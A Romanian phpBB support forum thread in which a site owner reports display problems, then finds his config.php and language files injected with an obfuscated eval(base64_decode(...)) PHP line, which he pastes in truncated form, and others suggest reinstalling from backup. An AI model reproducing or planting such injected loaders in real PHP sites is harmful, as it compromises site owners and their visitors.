Problema la vizualizarea forumului!!!

Folosiţi acest forum pentru a discuta problemele apărute în timpul folosirii forumului phpBB 3.0.x.
Reguli forum
Aveti o problema si vreti sa primiti ajutor? Click aici ! Nu uitati si de regulamentul forumului !
Închis
JUANN
Utilizator înregistrat

Problema la vizualizarea forumului!!!

Mesaj de JUANN »

In momentul cind ma loghez cu contul de administrator sau un cont normal de utilizator detaliile despre subiecte nu apar la locul lor; insa in momentul cind ma deloghez totul revine la normal. Va rog sa priviti cele 2 imagini atasate si sa-mi spuneti cum as putea corecta inconvenient. Pe forum nu am instalat nici un fel de modificare!!
Asa arata cind sunt logat:
Imagine.

Asa arata cind sunt delogat:

Imagine.
JUANN
Utilizator înregistrat

Mesaj de JUANN »

Cred ca cineva mi-a atacat site-ul deoarece am gasit in fisierul config.php al forumului scris foarte mult text.... Am sters toate fisierele si le-am instalat din nou si nu mai face probleme. Mentionez ca la baza de date nu am umblat deloc.
JUANN
Utilizator înregistrat

Mesaj de JUANN »

Uitati ce am gasit in fisierele de limba romana:

Cod: Selectaţi tot

<? /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFy
dCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXh
pc3RzKCcvaG9tZS9ybzJuZXQvcHVibGljX2h0bWwvbWFtYm90cy9lZGl0b3JzL3RpbnltY2UvanNj.........0Q3NkI5QjdFN
kM3MzY0RkI5MUUyRTkwO319b2Jfc3RhcnQoJ
2Rnb2JoJyk7fX19')); ?>

Cum de au reusit sa faca asa ceva? Versiunea era 3.0.2
Ultima oară modificat 22-Noi-2008, 23:33:04 de către JUANN, modificat de 2 ori în total.
CaTalyN
Utilizator înregistrat
Versiune: 3.0.0
Ext: Nu
Server: UNIX/Linux
Nivel phpBB: Mediu
Nivel php: Neexperimentat

Mesaj de CaTalyN »

meriti ban pentru dulbu post :!:
Gyuky
Utilizator înregistrat
Ext: Nu
Server: Windows
Nivel phpBB: Mediu
Nivel php: Mediu

Mesaj de Gyuky »

CaTalyN scrie:meriti ban pentru dulbu post :!:
Si tu pentru ca esti ranker si app ala e triplu post .

ON : Salveaza backupul si instaleaza din nou phpbb3 si urci backupul si selectezi doar ce vrei sa ai de la vechiul forum [useri , posturile . rankurile , etc] din phpmyadmin -> cpanel
JUANN
Utilizator înregistrat

Mesaj de JUANN »

Ce ban flacai? Va lasa vederea?

Eu va intrebam cu este posibil sa se intimple asa? Mai nou vazusi ca toate feşerele .php pe care le aveam sunt infectate cu stringul de mai sus.

Faza nasoala e cam apar fisiere ciudate in contul de hosting. Eu ma intrebam ce vulnerabilitate a phpbb 3.0.2 au resuist sa exploateze de au putut face asa ceva.
Închis

Înapoi la “3.0.x Funcţionare”